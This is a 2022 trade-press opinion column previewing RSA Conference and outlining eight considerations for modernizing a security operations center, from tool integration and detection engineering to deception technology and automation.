SOC Modernization: 8 Key Considerations
The RSA 2022 Security Conference is just weeks away, and the security diaspora is beefed up and ready to meet in person at the Moscone Center in San Francisco.
While we’ve certainly done a lot of work remotely over the past 2 years, cybersecurity remains in a precarious position in 2022, so industry consolidation is in order. We are at a point where the scale and complexity of historical security defenses are either not working or are stretched to their limits. That means CISOs need to think about security transformation, and as they do, every process and layer of the security technology stack is at stake.
Now, there will be a lot of hype at the conference around security “platforms” such as Extended Detection and Response (XDR), Cloud Native Application Protection Platforms (CNAPP), Secure Access Service Edge (SASE), and Zero Trust, all important topics, but also littered with industry hype and associated user confusion. My good friend Candy Alexander, President of ISSA International, and I will be discussing these trends at our RSA session Tuesday morning (6/7). But when I’m not presenting with Candy, I’ll be learning everything I can about upgrading the Security Operations Center (SOC).
Let me describe in more detail what I mean by SOC modernization. SOCs are where the proverbial rubber meets the road when it comes to cybersecurity. SOC analysts are responsible for detecting threats in a timely manner, investigating those threats to determine their scope and range, disrupting cyberattacks to prevent or minimize damage, working with IT operations to fully restore business/IT operations and then use those teachable moments to further strengthen their defenses.
Unfortunately, these processes have become cumbersome over the years. SOC staff face a constant tsunami of alerts, requiring them to respond with disconnected point tools and manual processes. And let’s not forget the global cybersecurity skills shortage. According to ESG research, The Life and Times of Cybersecurity Professionals 2021, 57% of organizations are affected by cybersecurity skills shortages, leading to increased staff workloads, high burnout rates, and an inability for security professionals to learn and use skills. cybersecurity technologies to their full potential.
SOC Modernization Planning Considerations
These issues should sound the sirens in the CISO office, guiding them toward strategies for modernizing the SOC. When developing these plans, they should consider:
- The SOC architecture. Today’s disconnected tools have become tomorrow’s interoperable technology architecture. Whether you call it Security Operations and Analytics Platform Architecture (SOAPA, ESG’s term) or Cybersecurity Mesh (Gartner’s term), disparate technologies like EDR, NDR, SIEM, TIP and SOAR require tight integration. Some organizations refer to a modern SOC as a fusion center, combining threat researchers, SOC analysts, and incident responders. This mashup can only work if it is anchored in an open and customizable SOC architecture.
- Scale and performance. As the saying goes, “all data is security data”. In other words, SOC teams collect, process, and analyze terabytes of data from security tools, IT infrastructure components, applications, CSPs, SaaS vendors, identity stores, threat intelligence feeds, etc., to determine if they are being attacked. This requires a highly scalable cloud backend that can ingest real-time data streams and deliver acceptable response times for complex queries.
- Detection engineering. As technology vendors have improved in producing detection rules content, SOC teams need better tools to easily develop, modify, and share custom rule sets. This means developing expertise with Yara rules (and Yara-L for Google Chronicle), Sigma rules and Kestrel rules, while participating in open source projects like SNORT, BRO/Zeek, Suricata, etc. Specialist providers like AnvilLogic can help here. .
- MITER ATT&CK affinity. The MITER ATT&CK framework has become a lingua franca of security operations, but many organizations have not moved beyond using it as a source of reference. SOC Modernization goes one step further by operationalizing MITER ATT&CK for use cases such as threat detection, control assessment/engineering, adversary behavior tracking, and continuous testing. Yes, security tools should support MITER ATT&CK, but it should go beyond simply associating alerts with the tactics and techniques of the matrix. Rather, they should contribute and participate in these more comprehensive use cases.
- Risk-based context. When an asset is under attack, security analysts need to understand whether it is a test/development server or a cloud-based workload hosting a mission-critical application. To gain this insight, SOC modernization combines data on threats, vulnerabilities, and business context for analysts. A quick look at the industry confirms that this mix is already happening. Cisco bought Kenna Security for risk-based vulnerability management, Mandiant grabbed Intrigue for attack surface management, and Palo Alto also gobbled up Expanse Networks for ASM. Meanwhile, SIEM leader Splunk provides risk-based alerts to help analysts prioritize response and remediation actions. The modernization of the SOC makes this mixture a requirement.
- Continuous trials. SOC modernization includes a commitment to continuous improvement. This means understanding the behavior of threat actors, validating that security defenses can counter modern attacks, and then reinforcing any defensive gaps that arise. CISOs are evolving into a continuous red team and a purple team for this very purpose. In this way, SOC modernization will drive demand for continuous testing and attack path management tools from vendors such as AttackIQ, Cymulate, Randori, SafeBreach, and XMCyber.
- Deception technology. Okay, this one might be a bit controversial because most cybersecurity professionals believe that deception technology is only appropriate for elite practitioners – the infosec equivalent of Dumbledore. This was true 10 years ago but not anymore. Modern deception technology can understand an organization’s assets, identities, and data, then mimic them by creating authentic decoys and decoys. The best deception systems, like those from ZScaler/Smokescreen, do a lot of the work themselves. In the face of threats like ransomware that could wipe out all business operations, I think it’s time to add deception technology as a layer of defense (and more) for SOC modernization.
- Automation of processes. We have been working on this for several years now, but I believe that modernizing the SOC will be a force multiplier for the automation of security operations processes. Why? Technology integration makes it easy, low-code/no-code SOAR tools like Torq’s have alleviated the need for Python gurus, and many SOC technologies provide pre-built automation templates and workflows. Finally, modernizing the SOC gives CISOs the ability to assess and reengineer processes, making them more friendly for automation.
SOC modernization goes beyond technology alone, providing organizations with the ability to reassess skills and roles, while supporting a distributed workforce. More on that soon. During that time, I’ll comb through the hallways, ballrooms, and meeting rooms of RSA, soaking up as much knowledge as I can about SOC modernization.
Copyright © 2022 IDG Communications, Inc.